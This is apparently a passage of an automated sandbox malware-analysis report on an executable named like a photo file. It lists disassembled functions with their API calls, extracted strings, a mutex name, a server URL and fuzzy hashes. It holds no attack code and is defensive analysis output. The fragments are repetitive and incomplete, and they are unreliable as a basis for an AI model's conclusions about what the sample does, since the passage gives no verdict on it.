                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AttributesDriveFileH_prolog3_LogicalStrings_memmove_memset_wcslen
                                                                • String ID: C:\$D:\$E:\$F:\$G:\
                                                                • API String ID: 2936073972-2884276237
                                                                • Opcode ID: 50c8363b570c5a5cadd72b561dbb607079738c07f0e3355fc245e47fa2f79f6a
                                                                • Instruction ID: 19f0a99a383e8387b7ac70272188f837277eb524ec4807d19a21823c819fad97
                                                                • Opcode Fuzzy Hash: 50c8363b570c5a5cadd72b561dbb607079738c07f0e3355fc245e47fa2f79f6a
                                                                • Instruction Fuzzy Hash: C1B142B180121D9ADF20EB65CC85BDEB7B9AF04308F1141EAE60DB3291D7785F898F59
                                                                Function 00412D45 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 257timeCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00412D4C
                                                                • KillTimer.USER32(?,?,00000000,0000000C,0040CD80,?,00000004,00403A81,00000001,00000001,00000001,00000001,00000001,00000001,?,00000001), ref: 00412DD4
                                                                • DeleteObject.GDI32(?), ref: 00412E0F
                                                                • DeleteObject.GDI32(?), ref: 00412E2A
                                                                • IsWindow.USER32(?), ref: 00412F7C
                                                                • KillTimer.USER32(?,?), ref: 00412F8B
                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00412FB4
                                                                • DeleteDC.GDI32(?), ref: 00412FC8
                                                                • DeleteDC.GDI32(00000000), ref: 00412FD2
                                                                • DeleteObject.GDI32(?), ref: 00412FDC
                                                                • DeleteObject.GDI32(?), ref: 00412FEA
                                                                • ReleaseDC.USER32(?,?), ref: 00412FFA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Delete$Object$KillTimerWindow$DestroyH_prolog3Release
                                                                • String ID: $_
                                                                • API String ID: 2213815971-415369738
                                                                • Opcode ID: 66267fc4f6ca079e01ff33d23872155a57ab4e94b93d04f30833c4b5e2df8809
                                                                • Instruction ID: bfd15da35a11be482944104f8796b7abed4eb66acd651ab7b820b9bc4ad19449
                                                                • Opcode Fuzzy Hash: 66267fc4f6ca079e01ff33d23872155a57ab4e94b93d04f30833c4b5e2df8809
                                                                • Instruction Fuzzy Hash: CDA16C316002059BCF11EF21C985BEA77B5BF44704F05047AEC09EF256DB78EA96DBA8
                                                                Function 0043413E Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 236COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __fassign$wcstoxl
                                                                • String ID: childpadding$hscrollbar$hscrollbarstyle$inset$mousechild$true$vscrollbar$vscrollbarstyle$vscrollsize
                                                                • API String ID: 3403923588-4216847745
                                                                • Opcode ID: 7b7e70b2e459fda1148ec1ccc51894de297674fdcaf51a398844d38fe70342c9
                                                                • Instruction ID: b8712f151f4086fb55523d04d226814251979ffb4531bce7cd8aa425df290c64
                                                                • Opcode Fuzzy Hash: 7b7e70b2e459fda1148ec1ccc51894de297674fdcaf51a398844d38fe70342c9
                                                                • Instruction Fuzzy Hash: 0F619231344610AFDB04AE359C46AEF33E9EF8A715F14046EF846DB292DB38E905875A
                                                                Function 00420F6F Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: foreimage$group$selected$selectedbkcolor$selectedfont$selectedhotimage$selectedimage$selectedtextcolor$true
                                                                • API String ID: 0-424508322
                                                                • Opcode ID: 6c39cb35887672e78d8bd4c3e15de8e010739cfc8e28548d6a88cebd8fe3235b
                                                                • Instruction ID: 96cba9a77a2225af5b1c1a2397a4f4dcdec2e7ec0a9b290742bf607424616419
                                                                • Opcode Fuzzy Hash: 6c39cb35887672e78d8bd4c3e15de8e010739cfc8e28548d6a88cebd8fe3235b
                                                                • Instruction Fuzzy Hash: 23310731344A16BADB187B22EC07DEE3398EF26724F54441BF005964D1FB7CAA91479E
                                                                Function 004255A0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 171fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004255AA
                                                                  • Part of subcall function 004257FB: _free.LIBCMT ref: 00425802
                                                                  • Part of subcall function 004257FB: _free.LIBCMT ref: 00425810
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00411C5D,?,00000000,?,?,00000000), ref: 0042564E
                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00411C5D,?,00000000,?,?,00000000), ref: 00425691
                                                                • CloseHandle.KERNEL32(?,?,?,?,00411C5D,?,00000000,?,?,00000000), ref: 0042569D
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00629448,00000398,00421BC8,?,?,00000000,?,?), ref: 00425614
                                                                  • Part of subcall function 00415EBD: _wcslen.LIBCMT ref: 00415EC0
                                                                  • Part of subcall function 00415EBD: _wcslen.LIBCMT ref: 00415EC8
                                                                  • Part of subcall function 00415EBD: _malloc.LIBCMT ref: 00415EE6
                                                                  • Part of subcall function 00415EBD: _wcscpy.LIBCMT ref: 00415EEF
                                                                  • Part of subcall function 00415EBD: _wcscat.LIBCMT ref: 00415EF7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: File$_free_wcslen$CloseCreateH_prolog3_HandleReadSize_malloc_wcscat_wcscpy
                                                                • String ID: Could not find ziped file$Could not read file$Could not unzip file$Error opening file$Error opening zip file$File is empty$File too large
                                                                • API String ID: 1435281779-2950584456
                                                                • Opcode ID: 089788c8bb4dc6fa4c68eb775e01a61f4f9500d70835ca0cf8844786aa7078cf
                                                                • Instruction ID: a5e4a865aebd0d913fdf645aa585075e68b3d7191c26a6ceb6cd2d777d2dce0e
                                                                • Opcode Fuzzy Hash: 089788c8bb4dc6fa4c68eb775e01a61f4f9500d70835ca0cf8844786aa7078cf
                                                                • Instruction Fuzzy Hash: F151C330A40635AFCB22BB21BC85E9F77BDDF81714F90009BF04DA7151DAB84E819B59
                                                                Function 02472C0C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111filesleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 02472C4B
                                                                • _memset.LIBCMT ref: 02472C74
                                                                • Sleep.KERNEL32(00000001), ref: 02472C94
                                                                • _malloc.LIBCMT ref: 02472CCE
                                                                • _memset.LIBCMT ref: 02472CFB
                                                                • WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 02472D13
                                                                • _free.LIBCMT ref: 02472D1A
                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02472D42
                                                                • FlushFileBuffers.KERNEL32(?), ref: 02472D4E
                                                                • CloseHandle.KERNEL32(?), ref: 02472D5A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_free_malloc
                                                                • String ID: cef.dll$lib
                                                                • API String ID: 1923221151-1944707463
                                                                • Opcode ID: 7330a4ae3c27d1dadd81684d78e8efffb433a72c70ea4ad4f27d5df6dff267d6
                                                                • Instruction ID: 0fceae309479ce166897778d1378e230e9ee0a74a87b95a6dc47ff03961b2feb
                                                                • Opcode Fuzzy Hash: 7330a4ae3c27d1dadd81684d78e8efffb433a72c70ea4ad4f27d5df6dff267d6
                                                                • Instruction Fuzzy Hash: 1A31727190012CAFDB259F64CC84BEEB779EF59314F0041DAF698A6150DBB19EC58F50
                                                                Function 1000CE12 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _write_string$__aulldvrm__cftof_free
                                                                • String ID: $-$@$g
                                                                • API String ID: 930703613-2320099971
                                                                • Opcode ID: 1c6ed216b4f0d8845ad380d28e9a07b98cb5bb3bb48720975a30eaeebe8f0ac7
                                                                • Instruction ID: d670f99d0ba554fd1c069206a70cff0ff4ce38d4261c7a297b90793a6e111664
                                                                • Opcode Fuzzy Hash: 1c6ed216b4f0d8845ad380d28e9a07b98cb5bb3bb48720975a30eaeebe8f0ac7
                                                                • Instruction Fuzzy Hash: D5F1677180436E9AFB60EB54CC88BECB7B4EB15394F1001EAD809A6169DB749FC5CF61
                                                                Function 0047FFB0 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 230libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • _memmove.LIBCMT ref: 004800B5
                                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,00000000,000000FF,00000000,000000FF,00000000,000000FF), ref: 00480103
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0048010A
                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 0048011A
                                                                • _wcslen.LIBCMT ref: 00480134
                                                                • _memmove.LIBCMT ref: 00480188
                                                                • _memmove.LIBCMT ref: 00480206
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memmove$AddressCurrentHandleModuleProcProcess_malloc_wcslen
                                                                • String ID: x32$ x64$IsWow64Process$kernel32
                                                                • API String ID: 3631062688-2295665499
                                                                • Opcode ID: 6bf74be0f02c1301438a7b3d03dc805a90a0dc2e8377248a0dc013ff1503c752
                                                                • Instruction ID: 1588b923edf3e0fd51ca21a9ba332da6fa4df09b936f7767c6709a7911d38569
                                                                • Opcode Fuzzy Hash: 6bf74be0f02c1301438a7b3d03dc805a90a0dc2e8377248a0dc013ff1503c752
                                                                • Instruction Fuzzy Hash: 5081C0B1A007009BDB24EF68D845A5EB7F0FF45314F104A2EE85597381EB78E919CBA6
                                                                Function 00412476 Relevance: 18.1, APIs: 12, Instructions: 78windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindow.USER32(?,00000004), ref: 0041248C
                                                                • ShowWindow.USER32(?,00000001), ref: 0041249B
                                                                • EnableWindow.USER32(?,00000000), ref: 004124AC
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004124C9
                                                                • EnableWindow.USER32(?,00000001), ref: 004124F1
                                                                • SetFocus.USER32(?), ref: 004124F7
                                                                • TranslateMessage.USER32(?), ref: 0041250D
                                                                • DispatchMessageW.USER32(?), ref: 00412516
                                                                • IsWindow.USER32(?), ref: 00412526
                                                                • EnableWindow.USER32(?,00000001), ref: 00412536
                                                                • SetFocus.USER32(?), ref: 0041253C
                                                                • PostQuitMessage.USER32(?), ref: 0041254D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Window$Message$Enable$Focus$DispatchPostQuitShowTranslate
                                                                • String ID:
                                                                • API String ID: 200552106-0
                                                                • Opcode ID: 806199e1e45e92039c35caee24f6383540511a90fe739c8d713111a0d0e475c2
                                                                • Instruction ID: 7a4c22902eec26b1cc1abba67ceba932577ef663fcf529d12a5851fe790961ab
                                                                • Opcode Fuzzy Hash: 806199e1e45e92039c35caee24f6383540511a90fe739c8d713111a0d0e475c2
                                                                • Instruction Fuzzy Hash: EB217C31104301AFDF20AF24EE8895BBBFAFB99701F000C1AF596D2260C775D958DA66
                                                                Function 1000CED3 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 297COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strlen.LIBCMT ref: 1000CDE6
                                                                • __malloc_crt.LIBCMT ref: 1000CEF2
                                                                  • Part of subcall function 1000F7C3: _malloc.LIBCMT ref: 1000F7CF
                                                                  • Part of subcall function 1000F7C3: Sleep.KERNEL32(00000000,00000001,00000000,?,1000EF1D,00000018,1001C310,0000000C,1000EFAD,00000000,00000000,?,1000E0E6,0000000D), ref: 1000F7E4
                                                                • _write_string.LIBCMT ref: 1000D264
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Sleep__malloc_crt_malloc_strlen_write_string
                                                                • String ID: -$@$g
                                                                • API String ID: 1737197384-2189933660
                                                                • Opcode ID: 05e6dee4c1ec301384bf17f50a44afcda908e642c184a6edd583bbe2eda48393
                                                                • Instruction ID: 38e135d151d98f754e14b0faf73c10f1739f74a8938eef3a98f8cde9852a052f
                                                                • Opcode Fuzzy Hash: 05e6dee4c1ec301384bf17f50a44afcda908e642c184a6edd583bbe2eda48393
                                                                • Instruction Fuzzy Hash: B0C17871C0536E9AEB60DB54CC88BECBBB4EB15394F1001EAD808A6159DB749FC5CF61
                                                                Function 00464650 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 197COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0045E7E0: std::exception::exception.LIBCMT ref: 0045E8BA
                                                                  • Part of subcall function 0045E7E0: __CxxThrowException@8.LIBCMT ref: 0045E8D5
                                                                  • Part of subcall function 0045E7E0: std::exception::exception.LIBCMT ref: 0045E8F3
                                                                  • Part of subcall function 0045E7E0: __CxxThrowException@8.LIBCMT ref: 0045E90E
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004646CA
                                                                • std::exception::exception.LIBCMT ref: 00464797
                                                                • __CxxThrowException@8.LIBCMT ref: 004647B2
                                                                  • Part of subcall function 0040C34C: std::locale::facet::_Incref.LIBCPMT ref: 0040C35A
                                                                  • Part of subcall function 00465EC0: std::_Lockit::_Lockit.LIBCPMT ref: 00465EED
                                                                  • Part of subcall function 00465EC0: std::_Lockit::_Lockit.LIBCPMT ref: 00465F10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8LockitLockit::_Throwstd::_std::exception::exception$Increfstd::locale::facet::_
                                                                • String ID: _$_
                                                                • API String ID: 2611909405-1355020722
                                                                • Opcode ID: 435c5684cd7f64129c8ff15a9655938a641548baded6dcb58237e8f7ca8e8fdc
                                                                • Instruction ID: f0f814180c02238e72a860ceba354db6bba1c0e4f6e9dd10c183197b5e33898b
                                                                • Opcode Fuzzy Hash: 435c5684cd7f64129c8ff15a9655938a641548baded6dcb58237e8f7ca8e8fdc
                                                                • Instruction Fuzzy Hash: 8871B0B59002489FCF04EF99C885AEEBBF5BF89308F14815EE405AB381D7799E05CB95
                                                                Function 00401169 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 140comsynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InitCommonControlsEx.COMCTL32 ref: 0040119D
                                                                  • Part of subcall function 00447FC0: _wcslen.LIBCMT ref: 0044812C
                                                                  • Part of subcall function 00401357: __EH_prolog3_GS.LIBCMT ref: 0040135E
                                                                  • Part of subcall function 004036F7: __EH_prolog3_GS.LIBCMT ref: 004036FE
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                • CreateMutexW.KERNEL32(00000000,00000000,?,dyzm_install_20170309), ref: 0040121C
                                                                • GetLastError.KERNEL32 ref: 00401226
                                                                • CloseHandle.KERNEL32(?), ref: 00401237
                                                                  • Part of subcall function 00401478: __EH_prolog3.LIBCMT ref: 0040147F
                                                                  • Part of subcall function 004029BD: __EH_prolog3_GS.LIBCMT ref: 004029C7
                                                                  • Part of subcall function 004029BD: _memset.LIBCMT ref: 00402A0C
                                                                  • Part of subcall function 004029BD: GetPrivateProfileStringW.KERNEL32(Debug,Log,005FD208,?,00000104,?), ref: 00402A4B
                                                                  • Part of subcall function 004029BD: GetPrivateProfileStringW.KERNEL32(Debug,BigServerUrl,https://chc-bd.duoyi.com,?,00000104,?), ref: 00402AC4
                                                                  • Part of subcall function 004029BD: GetCurrentThreadId.KERNEL32 ref: 00402B01
                                                                  • Part of subcall function 004029BD: SetTimer.USER32(00000000,00000064,000001F4,0040D770), ref: 00402B4B
                                                                  • Part of subcall function 00403528: __EH_prolog3.LIBCMT ref: 0040352F
                                                                  • Part of subcall function 00403528: SysFreeString.OLEAUT32(00000000), ref: 00403543
                                                                  • Part of subcall function 00403528: SysAllocStringLen.OLEAUT32(-00000002,?), ref: 0040355A
                                                                  • Part of subcall function 00403528: SysFreeString.OLEAUT32(00000000), ref: 0040356F
                                                                • CoInitialize.OLE32(00000000), ref: 004012FA
                                                                • OleInitialize.OLE32(00000000), ref: 00401301
                                                                • OleUninitialize.OLE32 ref: 00401336
                                                                • ReleaseMutex.KERNEL32(?), ref: 00401340
                                                                • CloseHandle.KERNEL32(?), ref: 0040134A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: String$H_prolog3_$CloseFreeH_prolog3HandleInitializeMutexPrivateProfile_wcslen$AllocCommonControlsCreateCurrentErrorInitLastReleaseThreadTimerUninitialize_memset
                                                                • String ID: dyzm_install_20170309
                                                                • API String ID: 1333864476-1464869293
